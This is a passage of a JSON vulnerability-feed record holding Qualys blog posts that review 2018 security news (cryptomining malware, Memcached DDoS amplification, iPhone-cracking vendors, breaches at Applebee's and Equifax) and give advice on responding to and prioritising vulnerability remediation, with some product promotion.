"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4438", "CVE-2017-5638", "CVE-2018-11776", "CVE-2016-3687", "CVE-2016-3081"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891264", "href": "http://www.myhack58.com/Article/html/3/62/2018/91264.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "qualysblog": [{"lastseen": "2019-01-23T20:50:13", "description": "In this week\u2019s InfoSec news review we\u2019ll dive into cryptomining, get the latest on DDoS amplification, go over recent data breaches, and check out another vendor claiming it can crack iPhones.\n\n### I, me, mine\n\nThe freight train that\u2019s cryptomining shows no sign of slowing down, and the cyber security implications are intensifying accordingly.\n\nThis week alone, Microsoft [detected and disrupted](<http://www.newsweek.com/crypto-mining-malware-outbreak-infected-500000-computers-single-day-836145>) a massive cryptomining malware campaign, a Tesla AWS account[ got hijacked](<http://fortune.com/2018/02/20/tesla-hack-amazon-cloud-cryptocurrency-mining/>), a new mining worm [was discovered](<https://securityboulevard.com/2018/03/worm-infects-redis-and-windows-servers-with-cryptomining-malware/>), and Kaspersky researchers warned about increased[ sophistication of infection methods](<https://www.businesswire.com/news/home/20180305005866/en/Million-Kaspersky-Lab-Identifies-Sophisticated-Hacker-Groups>). \n\nWhile there is a legitimate component to this business, malicious hackers eager to profit are aggressively breaching networks and infecting devices -- PCs, IoT systems, smartphones, servers -- to steal computing power for mining virtual currencies.\n\n_A cryptocurrency mining farm in Iceland. (Photo credit: By [Marco Krohn - Own work, CC BY-SA 4.0](<https://commons.wikimedia.org/w/index.php?curid=40495567>))_\n\nThe creation and verification process of virtual currencies like Bitcoin and Monero involves solving lengthy and complex mathematical calculations that require large amounts of [computing power](<https://www.coindesk.com/nvidia-cfo-crypto-mining-demand-beat-expectations-q4/>). Those involved in this [\u201cblockchain\u201d process](<https://www.investopedia.com/tech/how-does-bitcoin-mining-work/>) earn money from it, and the payouts have skyrocketed as the value of these cryptocurrencies has dramatically increased in the past several months.\n\nThat has attracted the attention both of legitimate players -- [individuals](<http://www.businessinsider.com/mining-cryptocurrency-making-a-profit-2018-2>) and [businesses](<https://www.theverge.com/2018/2/13/17008158/salon-suppress-ads-cryptocurrency-mining-coinhive-monero-beta-testing>) -- and, unfortunately, of bad actors, who are using malware to gain unauthorized access to systems they then leverage for mining.\n\n\u201cExploit kits are now delivering coin miners instead of ransomware. Scammers are adding coin mining scripts in tech support scam websites. And certain banking trojan families added coin mining behavior,\u201d Microsoft\u2019s Windows Defender team stated in its [blog post](<https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/>).\n\nBetween September and January, the number of websites hosting cryptomining scripts [spiked 725%](<https://www.cyren.com/blog/articles/increase-in-cryptocurrency-mining-threatens-more-than-just-your-cpu>), Cyren Security Lab said recently. That figure includes domains that are hosting these scripts knowingly, as well as those that have been breached.\n\nCryptomining attacks are purposefully stealthy and silent: They avoid noticeably disrupting breached systems\u2019 operations in order to remain undetected. \u201cFor coin miner malware, persistence is key. These types of malware employ various techniques to stay undetected for long periods of time in order to mine coins using stolen computer resources,\u201d reads Microsoft\u2019s blog post.\n\nThus, cryptomining gives hackers \u201call of the financial upside\u201d of ransomware and other attacks without having to engage the victim and while drawing less law enforcement attention, Cisco\u2019s Talos unit [explained](<http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) in late January.\n\nAs industry analyst Jason Bloomberg put it in a [Forbes column](<https://www.forbes.com/sites/jasonbloomberg/2018/03/04/top-cyberthreat-of-2018-illicit-cryptomining/#4b6bdcc05ae8>) recently, \u201cransomware is oh, so 2017,\u201d as \u201csmart hackers have turned to illicit cryptomining to fill their coffers\u201d lured by a perfect storm of \u201ceasy money, slim chance of detection, and billions of unsuspecting targets that may not even care they\u2019ve been hacked.\u201d\n\nLast month, Imperva [reported](<https://www.imperva.com/blog/2018/02/new-research-crypto-mining-drives-almost-90-remote-code-execution-attacks/>) that cryptomining now drives almost 90% of all remote code execution attacks. Kaspersky Lab put the number of users attacked by malicious miners[ at 2.7 million in 2017](<https://securelist.com/mining-is-the-new-black/84232/>), up 50% from 2016. And according to Check Point, [23% of global organizations](<https://coinjournal.net/23-organizations-globally-affected-crypto-mining-malware-coinhive-says-cybersecurity-firm/>) were affected in January by the Coinhive crypto-mining malware. \n\nMeanwhile, Malwarebytes Labs [ranks](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) malicious cryptomining as its top detection since September. While acknowledging that malicious cryptomining appears to be far less dangerous to the user than ransomware, Malwarebytes Labs warned that its effects should not be underestimated. \u201cIndeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down,\u201d reads the Malwarebytes Labs post.\n\nOrganizations that have been compromised in recent months include the U.K.\u2019s [Information Commissioner\u2019s Office](<http://www.bbc.com/news/technology-43025788>) (ICO), [U.S. federal courts](<http://fortune.com/2018/02/12/us-courts-coinhive-monero-cryptocurrency-miner/>), [Australian state governments](<https://www.theguardian.com/technology/2018/feb/12/cryptojacking-attack-hits-australian-government-websites>), and the[ LA Times newspaper](<https://nakedsecurity.sophos.com/2018/02/27/unsecured-aws-led-to-cryptojacking-attack-on-la-times/>).\n\nAttack targets have included [vulnerable Jenkins servers](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>), [unsecured Docker containers](<https://blog.aquasec.com/cryptocurrency-miners-abusing-containers-anatomy-of-an-attempted-attack>), [Microsoft Windows systems](<https://securityboulevard.com/2018/03/worm-infects-redis-and-windows-servers-with-cryptomining-malware/>), and browsers. Hackers have used multiple types of attack vehicles, including[ malvertising](<https://threatpost.com/ad-network-circumvents-ad-blocking-tools-to-run-in-browser-cryptojacker-scripts/130161/>), email, malware-laced apps, targeted hits, and exploit kits.\n\nFor example, the coin mining campaign detected by Microsoft\u2019s Windows Defender team this week used variants of the Dofoil/Smoke Loader malware in the form of sophisticated trojans with \u201cadvanced cross-process injection techniques, persistence mechanisms, and evasion methods.\u201d\n\nThe Dofoil trojans attacked Explorer.exe with a \u201cprocess hollowing\u201d code-injection technique that created a new instance of the \u201cc:\\windows\\syswow64\\explorer.exe\u201d process and replaced the legit code with malware.\n\n\u201cThe hollowed Explorer.exe process then spins up a second malicious instance, which drops and runs a coin mining malware masquerading as a legitimate Windows binary, wuauclt.exe,\u201d Microsoft explained. Dofoil uses a customized mining application that can mine different cryptocurrencies. To avoid detection, Dofoil modifies the registry, according to Microsoft.\n\nAnd let us not forget good, old physical -- aka, real world -- security breaches. The Associated Press reported that crooks [stole 600 servers](<https://apnews.com/55117fb55a714e909fb9aaf08841a5d6/Bitcoin-heist:-600-powerful-computers-stolen-in-Iceland>) from data centers in Iceland that were being used for cryptomining. The servers, which haven\u2019t been found, are worth $2 million, and were swiped in a series of four heists in December and January. So far, 11 people have been arrested in connection with the investigation.\n\n### Memcached servers used for DDoS attacks\n\nLast week, we [reported](<https://blog.qualys.com/news/2018/03/02/apple-in-the-infosec-spotlight-as-github-falls-prey-to-amplified-ddos-attack>) on the troubling trend among hackers of using unprotected Memcached servers to dramatically [amplify the intensity](<https://www.darkreading.com/attacks-breaches/memcached-servers-being-exploited-in-huge-ddos-attacks/d/d-id/1331149?>) of their DDoS attacks. GitHub was on the receiving end of such a DDoS attack last week, which at the time was considered [the most intense ever](<http://www.zdnet.com/article/github-was-hit-with-the-largest-ddos-attack-ever-seen/>).\n\nWell, that record lasted for only a few days. This week, Arbor Networks [detected](<https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon-us/>) an even stronger DDoS attack against an unnamed customer of a U.S.-based service provider. The attack, according to Arbor Networks, reached 1.7Tbps at its peak and utilized the same Memcached reflection/amplification attack vector involved in the GitHub attack, which peaked at 1.35Tbps.\n\n \n\n_(Source: Arbor Networks)_\n\n \n\nThe open source Memcached software is meant to be used behind firewalls on internal networks to boost server performance, but many organizations have made them available from the Internet, and hackers are using them to significantly boost their DDoS attacks.\n\n\u201cWhile the internet community is coming together to shut down access to the many open Memcached servers out there, the sheer number of servers running Memcached openly will make this a lasting vulnerability that attackers will exploit,\u201d reads Arbor Networks\u2019 blog post.\n\nFor detailed information about this trend, in which attackers leverage the User Datagram Protocol (UDP), check out the write-ups from [Akamai](<https://blogs.akamai.com/2018/02/memcached-udp-reflection-attacks.html>), [Link11](<https://www.link11.com/en/blog/new-high-volume-vector-memcached-reflection-amplification-attacks/>) and [Cloudflare](<https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/>).\n\n\u201cAn attacker spoofing the UDP address of their intended victim can send just a small packet of data to a Memcached server, tricking it into blasting as much as 50,000 times more data in response,\u201d [wrote](<https://hotforsecurity.bitdefender.com/blog/world-record-broken-again-ddos-attack-exceeds-1-7-terabits-per-second-19653.html#new_tab>) security analyst Graham Cluley. \u201cThe result? A data tsunami.\u201d\n\nIn encouraging news, eWeek [reported on Friday](<http://www.eweek.com/security/memcached-ddos-attacks-slow-down-as-patching-ramps-up>) that patching efforts were starting to make a dent on these amplified DDoS attacks, according to the latest data gathered by Arbor and Cloudflare. \"We're still seeing lots of them, but their average size is considerably smaller due to ongoing cleanup and mitigation efforts,\" Steinthor Bjarnason, senior network security analyst at Arbor's Netscout unit, told eWEEK.\n\n### Another digital forensics vendor claims it can crack iPhones\n\nOn the heels of Cellebrite\u2019s recent claims that it can unlock and extract data from devices running all modern iOS versions including the most recent one, another digital forensics vendor is quietly making similar promises.\n\nForbes [reported](<https://www.forbes.com/sites/thomasbrewster/2018/03/05/apple-iphone-x-graykey-hack/#7b81709b2950>) this week that a \"mysterious\" company called GrayKey is distributing marketing materials that describe online and offline tools that allow it to unlock devices running iOS 10 and iOS 11, including the latest iPhone X.\n\n_A second digital forensics vendor now claims it can crack iOS devices, including the iPhone X, pictured here. (Photo credit: Apple)_\n\nForbes\u2019 February [report](<https://www.forbes.com/sites/thomasbrewster/2018/02/26/government-can-access-any-apple-iphone-cellebrite/#cb3ce1f667a0>) on Cellebrite\u2019s claims -- which extend to Android devices as well -- generated a lot of concern among privacy and security experts.\n\nCellebrite has been telling its customers, which are primarily government, military and corporate investigative teams, that it\u2019s able to unlock and extract data from devices running iOS 11, such as the iPhone X, as well as other iPhones, iPads and iPods.\n\nConcerns center on the possibility that whatever technique and knowledge Cellebrite -- and now apparently GrayKey -- may possess could fall into the hands of criminals, be independently replicated by bad actors, or be abused by governments.\n\nThe situation also highlights the ongoing tug-of-war between tech vendors and law enforcement agencies, as the former resist watering down encryption on their products, while the latter argue they need access to devices and data for their investigations.\n\n### Speaking of law enforcement\u2019s distaste for strong encryption\n\nThis week FBI Director Christopher Wray, speaking at Boston College's second annual cybersecurity summit, reiterated his agency\u2019s opposition to \u201cunbreakable encryption,\u201d saying it creates \u201ca major public safety issue,\u201d according to a[ CSO Magazine report](<https://www.csoonline.com/article/3261100/encryption/fbi-chief-calls-for-public-private-detente-on-encryption.html#tk.rss_all>).\n\nSaying that in fiscal 2017 FBI investigators failed to retrieve the contents of 7,775 devices to which judges had granted them access, Wray \u201cmade an impassioned appeal for help from the tech sector and the security community,\u201d CSO reported.\n\nIn related news, it transpired this week that the FBI has established close collaboration with Best Buy\u2019s Geek Squad team of computer repair technicians. According to[ documents obtained by the Electronic Frontier Foundation (EFF)](<https://www.eff.org/deeplinks/2018/03/geek-squads-relationship-fbi-cozier-we-thought>), the FBI has been paying Geek Squad staffers for years for tips about illegal material they may find in the computers they\u2019re fixing.\n\n### Data breach included with your meal, your video game and your credit report\n\n\n\nThe Applebee\u2019s restaurant chain recently [discovered](<https://www.rmhfranchise.com/dataincident/>) malware in the POS (point of sale) systems of more than 160 of its eateries. At risk: Customers\u2019 names, credit and debit card numbers, expiration dates and card verification codes.\n\nThe incidents occurred in recent months, going back to November of last year, but Applebee\u2019s didn\u2019t discover the issue until mid-February.\n\n \n\n\u201cWe\u2019re seeing more of these types of breaches happening\u2026 it\u2019s an industry wide problem as more retailers look to an ecosystem of providers to bring in third party systems like point of sale and inventory management solutions,\u201d Fred Kneip, CEO of security firm CyberGRX [told Threatpost](<https://threatpost.com/pos-malware-found-at-160-applebees-restaurant-locations/130281/>). \u201cAs of today a lot of stores are playing catch up with security, and it can take months or years to realize that compromises have happened on third party systems.\u201d\n\nMeanwhile, customers of games developer Nippon Ichi Software (NIS) America are also at risk for credit card fraud and ID theft, after two of its online stores -- [NIS America](<https://store.nisamerica.com/>) and [SNKonlinestore](<https://snkonlinestore.com/>) -- were hacked.\n\n\n\nThe breach occurred on Jan. 23 and wasn\u2019t discovered until Feb. 26. Compromised data included customer name, address, credit card number, expiration date, security code, and email address.\n\nAccording to the email NIS America sent to customers -- as [re-printed by NintendoLive.com](<http://www.nintendolife.com/news/2018/03/nis_americas_online_stores_hacked_credit_card_details_compromised>) -- customers were redirected to an external web page where their information was captured, before being sent back to the company\u2019s online store to complete the transaction.\n\nAnd in the latest chapter of the monster data breach that just keeps on giving, Equifax [disclosed](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) that there are another 2.4 million Americans whose personal data was stolen by hackers in last year\u2019s infamous and massive hack. That ups the total of people affected to about 148 million. The data thieves accessed Equifax\u2019s systems and data by exploiting the Apache Struts CVE-2017-5638 vulnerability, for which a patch was available.\n\n### In other InfoSec news \u2026\n\n * Duo Security, which provides a two-factor authentication app, is detailing a [serious flaw](<https://duo.com/labs/psa/duo-psa-2017-003>) it recently fixed in its product as well as [the flaw\u2019s root cause](<https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations>) -- SAML vulnerabilities -- which also affects third-party products and services. \u201cDuo disclosed the problem responsibly late last year, and after giving vendors \u2013 including itself \u2013 time to fix the bug, has now gone public with an excellent and educational explanation of what went wrong,\u201d [writes](<https://nakedsecurity.sophos.com/2018/02/28/single-sign-on-authentication-the-bug-that-let-you-logon-as-someone-else/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29>) Lisa Vaas in Sophos\u2019 Naked Security blog.\n * Facebook\u2019s Oculus Rift VR headsets temporarily stopped working after the company [let its security certificate lapse](<https://www.theverge.com/2018/3/8/17095414/oculus-rift-software-fix-certificate-expiry>).\n * MoviePass CEO Mitch Lowe set off privacy alarms when he [boasted](<https://www.csoonline.com/article/3260629/privacy/thanks-to-moviepass-app-tracking-ceo-claims-we-know-all-about-you.html>) this week during a keynote address that his company\u2019s eponymous app has such an ability to track its subscribers -- including via GPS data -- that \u201cwe know all about you.\u201d After the inevitable backlash, the company [the next day](<https://www.theverge.com/2018/3/8/17096442/moviepass-updates-ios-app-unused-location-tracking-features>) announced it was removing the app\u2019s location tracking features.\n\n* * *\n\n_With the [Qualys Cloud Platform ](<https://www.qualys.com/cloud-platform/>)and its suite of natively integrated, self-updating security and compliance [Cloud Apps](<https://www.qualys.com/apps/>), Qualys pro__vides automated, continuous and scalable prevention and response__. __Qualys offers customers [complete and instant visibility of IT assets](<https://www.qualys.com/apps/asset-inventory/>) wherever they reside -- on premises, in clouds, and remote endpoints; comprehensive and continuous [vulnerability management](<https://www.qualys.com/apps/vulnerability-management/>); granular [assessment of secure system configurations](<https://www.qualys.com/apps/policy-compliance/>); [monitoring of file integrity](<https://www.qualys.com/apps/file-integrity-monitoring/>); [web application scanning and firewall](<https://www.qualys.com/apps/web-app-scanning/>); [detection of compromise](<https://www.qualys.com/apps/indication-of-compromise/>); and multiple other security and compliance solutions._", "cvss3": {}, "published": "2018-03-09T21:45:09", "type": "qualysblog", "title": "Cryptomining is all the rage among hackers, as DDoS amplification attacks continue", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-09T21:45:09", "id": "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1", "href": "https://blog.qualys.com/news/2018/03/09/cryptomining-is-all-the-rage-among-hackers-as-ddos-amplification-attacks-grow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "It\u2019s happening more and more. \n\n_Gill Langston, a Qualys Director of Product Management, speaks at RSA Conference 2018_\n\nHigh profile vulnerabilities like Meltdown and Spectre are disclosed, and become headline-grabbing news not just in the technology press, but on general news outlets worldwide.\n\nEven if the vulnerabilities aren\u2019t associated with an attack, the news reports rattle C-level executives, who ask the security team for a plan to address the by now notorious bug, and pronto.\n\nOften, a counter-productive disruption of the normal vulnerability and patch management operations ensues, as those involved scramble to draft a response against the clock in a panic atmosphere, punctuated by confusion and finger-pointing.\n\n\u201cShould I just immediately be jumping and reacting? Should I start deploying patches, and then go from there? I\u2019m going to argue that that\u2019s not always the case,\u201d Gill Langston, a Product Management Director at Qualys, said Wednesday during a presentation at RSA Conference 2018.\n\n### The right approach\n\nWhat security teams should aim for is a coherent, appropriate and rational response plan that is grounded in a factual and comprehensive assessment of the situation, said Langston, whose presentation was titled \u201cThe Sky Is Falling! Responding Rationally to Headline Vulnerabilities.\u201d\n\n\u201cHow can I put this together and send something back to the C-level executives that says: \u2018This is my recommendation for now.\u2019 It may not always be to go deploy the patches,\u201d Langston said. \u201cCreate a plan, and then react, review and improve it over time.\u201d\n\nA key step in dealing effectively with this type of \u201cnews event\u201d vulnerabilities is to have a proper and solid vulnerability management and remediation program in place. That way, organizations are in a better position to do a precise risk assessment of disclosed bugs on a continuous basis, according to Langston.\n\nThis also means that when a high profile vulnerability is announced, security teams have a head start. That way, they don\u2019t have to go back to square one to ensure they are in fact identifying all assets before they can start to react.\n\nOrganizations will be able to pick the most appropriate course of action, which depending on the case, can be to patch right away, to mitigate when remediation is complex, or to monitor and wait before acting.\n\nBelow are three recent examples of each scenario.\n\n### Patch now, unless you \u201cwanna cry\u201d later\n\nMost organizations should have prioritized patching the vulnerability that was exploited by the WannaCry ransomware, way before the attack was unleashed, according to Langston. Instead, the [WannaCry attack](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) infected 300,000-plus systems and disrupted critical operations globally.\n\nMicrosoft disclosed the Windows vulnerability ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in mid-March 2017 and made a patch available. At the time, Microsoft rated the vulnerability as \u201cCritical\u201d due to the potential for attackers to execute remote code in affected systems.\n\nThe vulnerability also had a number of other red flags that made it stand out as a particularly concerning one. In mid-April, the vulnerability became even more dangerous when the [Shadow Brokers hacker group](<https://blog.qualys.com/securitylabs/2017/04/15/the-shadow-brokers-release-zero-day-exploit-tools>) released an exploit for it called EternalBlue.\n\nSo organizations had a window of about two months to install the patch before WannaCry was unleashed in mid-May. Had most affected systems been patched, WannaCry\u2019s impact would have been minor.\n\n\u201cIn most cases, organizations that follow the standard patching cycle of 30 days, they were already protected. And two months in, you got a second shot at it,\u201d he said.\n\nLangston displayed a graph with Qualys vulnerability scanning data showing that between mid-March and mid-April, detection of affected devices spiked and gradually declined as organizations scanned and patched their systems.\n\n\n\nHowever, the number of vulnerable systems shoots up after the EternalBlue release, after organizations apparently expanded the initial scope of scanned IT assets. \n\nAnd there\u2019s an important lesson here. \u201cWhen you\u2019re dealing with a vulnerability that can jump around your network, if you\u2019re not identifying all of the assets, you\u2019re already behind the eight ball,\u201d he said.\n\nThe graph shows that widespread patching didn\u2019t fully kick in until after the WannaCry attacks began.\n\nFom WannaCry, Langston identified some key no-nos: A slow identification of all at-risk assets; a tendency by IT operations teams to treat all issues with similar urgency; and a complacency among end users to delay rebooting their machines to finish the patching process.\n\n### Strut your firewall\n\nLangston then discussed the Struts web application vulnerability that was exploited most famously at Equifax, leading to that consumer credit reporting agency's massive data breach. On the same day that Struts was disclosed, and a patch made available, an exploit was also released, so the risk was high.\n\nBecause web application vulnerabilities tend to be difficult to remediate, often requiring a rebuild and long testing cycles, Struts highlights the importance of mitigation. In this case, a good plan would have been to use a[ web application firewall,](<https://blog.qualys.com/technology/2017/03/09/qualys-waf-2-0-protects-against-critical-apache-struts2-vulnerability-cve-2017-5638?>) while patching was in progress, he said. \n\n### Meltdown and Spectre: All bark and no bite?\n\nThen there are the Spectre and Meltdown vulnerabilities, which caused widespread alarm upon their disclosure in early January of this year, but for which there are only ineffective proof-of-concept exploits so far.\n\nIn the panic that was created, vendors such as Microsoft and Intel released faulty patches that IT departments rushed to apply, only to have to react after they caused system problems, including data corruption and performance issues.\n\nQualys data of vulnerability scans for Meltdown shows an initial push to install OS patches, followed by a long plateau of inactivity, as organizations probably weighed the fact that there were no exploits, and that the patches were problematic.\n\nA big lesson from Meltdown and Spectre? \u201cJust because it\u2019s in the news doesn\u2019t mean it\u2019s an emergency,\u201d Langston said. In other words, it\u2019s an example of a scenario where the most prudent thing to do is to monitor the situation and wait, instead of rushing to patch.\n\n### Best practices\n\nLangston recommends these six tips for crafting the best response to a notoriously public vulnerability:\n\n * Identify high-risk vulnerabilities often\n * Track the specific risk to your organization\n * Determine the best course of action\n * Decide when to communicate with internal stakeholders\n * Update regularly\n * Work the plan and improve it\n\nIt\u2019s also key to get buy-in from all the teams that will be involved in drafting, approving and executing the plan, including executives, security operations, DevOps, and IT operations. \u201cBuild the playbook together,\u201d he said.\n\nThe response plan should have four main elements:\n\n * Preparation, which involves ensuring that all assets are identified, that the triggers are documented and that the communication outreach is built\n * Reaction, which involves working the playbook, deciding on the course of action (fix, wait or mitigate), and communicating with your users\n * Revision, which involves reviewing the outcomes of the executed plan, and identifying improvement areas\n * Improvement, which involves collaboration to refine the response, modifying the plan based on findings, and extending the plan to all high-severity vulnerabilities\n\nThis should all amount to a rational, measured response, instead of to a knee-jerk reaction that leads to erratic, misguided decisions and actions.\n\n\u201cIf you don\u2019t have some response plan, you end up bouncing off of each other, pointing fingers and slowing down the entire process,\u201d he said.\n\nBelow is a checklist template that Langston suggests could be helpful in analyzing how to best respond to a \u201cheadline vulnerability\u201d.\n\n \nHere\u2019s how that checklist might look when filled out by a hypothetical organization for the Meltdown vulnerability.\n\n\n\nThis information can also be enriched and expanded using automated dashboards with threat feeds and other resources that are updated in real time and that allow security teams to do in depth analysis of relevant data.\n\nThe goal is that in the face of a headline-blaring vulnerability, organizations can come up with a well thought and sensible plan. \u201cA methodical approach leads to a rational response,\u201d Langston said.", "cvss3": {}, "published": "2018-04-19T23:00:03", "type": "qualysblog", "title": "The Sky Is Falling! Responding Rationally to Headline Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-19T23:00:03", "id": "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "href": "https://blog.qualys.com/news/2018/04/19/the-sky-is-falling-responding-rationally-to-headline-vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "Here\u2019s a stat that shows the importance of prioritizing vulnerability remediation: Almost 30% of the CVEs disclosed in 2017 had a CVSS score of \u201cHigh\u201d or \u201cCritical.\u201d That works out to about 3,000 such vulnerabilities, or about 58 every week.\n\nGiven this large number of severe vulnerabilities, it\u2019s critical for IT and security teams to make a deeper assessment of the risk they represent in the context of their organizations\u2019 IT environment.\n\nIf they identify the vulnerabilities that pose the highest risk to their organization\u2019s most critical assets, they\u2019ll be able to prioritize remediation accordingly and eliminate the most serious and pressing threats to their IT environment.\n\nHowever, as evidenced by the long list of major breaches caused by unpatched vulnerabilities, it\u2019s hard for many businesses, government agencies and not-for-profit organizations to prioritize remediation consistently and accurately.\n\n\u201cOne of the big challenges that we have as security professionals is trying to stay on top of our vulnerability management,\u201d Josh Zelonis, a Forrester Research analyst, said during a recent [webcast](<https://www.qualys.com/webcasts/prioritization-vulnerabilities-modern-it-environment/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=webcast&leadsource=344565181>).\n\nZelonis, who cited the CVE stat during the webcast, said that, according to a 2017 Forrester survey of global businesses, 58% of them experienced at least one breach in the previous 12 months. Among those, 41% of the breaches were carried out by exploiting a vulnerability.\n\n\u201cThis is really representative of the problems we\u2019re seeing in the industry with prioritization and getting patches deployed, and this is only increasing,\u201d he said.\n\n\u201cIn a post-Equifax world, VM is coming under increased scrutiny,\u201d Zelonis added, alluding to the massive data breach suffered by the credit reporting agency in 2017 after hackers exploited the Apache Struts vulnerability (CVE-2017-5638), which had been disclosed about six months before.\n\nRead on to learn valuable best practices for prioritizing remediation, and how Qualys can help your organization overcome this critical challenge.\n\n### Vulnerability management and prioritization tips\n\nAccording to Zelonis, the vulnerability risk management process has four main steps: \n\n * Asset identification\n * Enumeration of assets\n * Prioritization of patching\n * Remediation\n\nWhen assigning remediation priorities, it\u2019s key to examine the severity of the vulnerabilities in the context of each asset. \n\nFor example, it should be a top priority to remediate a critical vulnerability in an asset that\u2019s highly important. However, remediating that same vulnerability may not be a top priority when it\u2019s present in an asset of medium or low importance. \n\nIn vulnerability management, it\u2019s also helpful to use threat intelligence not just to detect threats, but to also preemptively patch using threat landscape trends as a guide.\n\n\u201cIt\u2019s important to understand how a vulnerability can be exploited so you can take a look at at the assets within your organization to figure out where patches need to be prioritized and applied,\u201d Zelonis said.\n\nThreat intelligence is also essential for security teams to be able to communicate effectively with C-level executives and board members, who are increasingly interested in staying informed about the organization\u2019s security posture and strategy.\n\n\u201cOnce you\u2019ve made it relevant to them, they\u2019re going to need to understand what you\u2019re doing to mitigate the situations and perhaps allocate additional budget where necessary,\u201d he said.\n\nIt\u2019s also important to communicate this information not just to the higher-ups, but also horizontally across other IT teams such as operations, and across business units, because vulnerability remediation requires cross-functional collaboration.\n\n\u201cThis is a major gap we see with organizations who are struggling to get items patched: The security team\u2019s priorities aren\u2019t echoed nor understood outside of the security team,\u201d he said.\n\nThe goal here is to make these other teams aware of the real risk and potential business impact of particular vulnerabilities.\n\nUltimately, organizations should evolve from vulnerability management to vulnerability risk management. That way, the focus isn\u2019t just on reducing false positives, but rather on assessing critical data points and metrics to attain an understanding of risk, according to Zelonis.\n\n### Qualys: Asset visibility, vulnerability management and threat prioritization\n\nWith Qualys, you\u2019ll get complete visibility of your IT assets wherever they reside -- on premises, in clouds or at remote endpoints -- and you\u2019ll be able to continuously detect and asses all your vulnerabilities, and precisely prioritize remediation.\n\nWith proper vulnerability management, you \u201cimmunize\u201d your IT assets against opportunistic attacks which are designed to exploit common, well-known bugs and which are the most likely to hit your network.\n\nLet\u2019s look at three Qualys products that work in tandem to provide you with this asset visibility, vulnerability detection and remediation prioritization.\n\n_Qualys AssetView_\n\n[Qualys AssetView](<https://www.qualys.com/apps/asset-inventory/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) automates collection and categorization of IT and security information, and provides a unified view of this data.\n\n\u201cIt brings IT and security data together,\u201d Qualys Product Management Director Jimmy Graham said during the webcast, titled \u201cPrioritization of Vulnerabilities in a Modern IT Environment.\u201d\n\n\n\nThe data, which is fed into the Qualys Cloud Platform for aggregation, indexing, correlation, and analysis, is continuously collected and updated using a variety of sensors, including:\n\n * Physical and virtual appliances that scan IT assets located on-premises, in private clouds, or in virtualized environments\n * Cloud appliances that remotely scan your infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS) instances in commercial cloud computing platforms\n * Lightweight, all-purpose cloud agents installed on IT assets that continuously monitor them\n\nThe data is made searchable via AssetView\u2019s search engine using ad-hoc queries. In addition, any query can be turned into interactive, continuously updated widgets in AssetView\u2019s customizable and dynamic dashboards. You can also generate detailed and custom-tailored reports.\n\nThis inventory provides both a complete \u201chorizontal\u201d list of IT assets as well as deep \u201cvertical\u201d details for each asset, including hardware specs, installed software, network connections, approved users, applied patches, and open vulnerabilities. \n\nIn addition, Qualys AssetView lets you assign criticality rankings to assets, since not all assets carry the same weight within your organization. Qualys lets you [tag your assets](<https://blog.qualys.com/news/2017/02/28/making-asset-inventory-actionable-with-a-cloud-based-system>), so you put relevant labels on them in the inventory and organize them in multiple ways.\n\n_Qualys Vulnerability Management_\n\n[Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) provides continuous, comprehensive coverage and visibility, as well as constant monitoring and alerts, in a way that makes vulnerability assessment effective in a \u201cperimeter-less world,\u201d according to Graham.\n\n\u201cWe call that \u2018perimeter-less world\u2019 because we collect vulnerabilities from on premises devices, and from private and public clouds. Through the agent, we can collect vulnerability information from roaming devices like laptops that employees may be using in a coffee shop or at home,\u201d he said.\n\n\n\nQualys VM maps all assets on the network, detailing their OS, ports, services and certificates, and scans them for vulnerabilities with Six Sigma 99.99966 percent accuracy. It assigns remediation tickets, manages exceptions, lists patches for each host, and integrates with existing IT ticketing systems.\n\nIn addition, VM generates comprehensive reports customized for different recipients \u2014 like IT pros, business executives or auditors \u2014 and incorporates 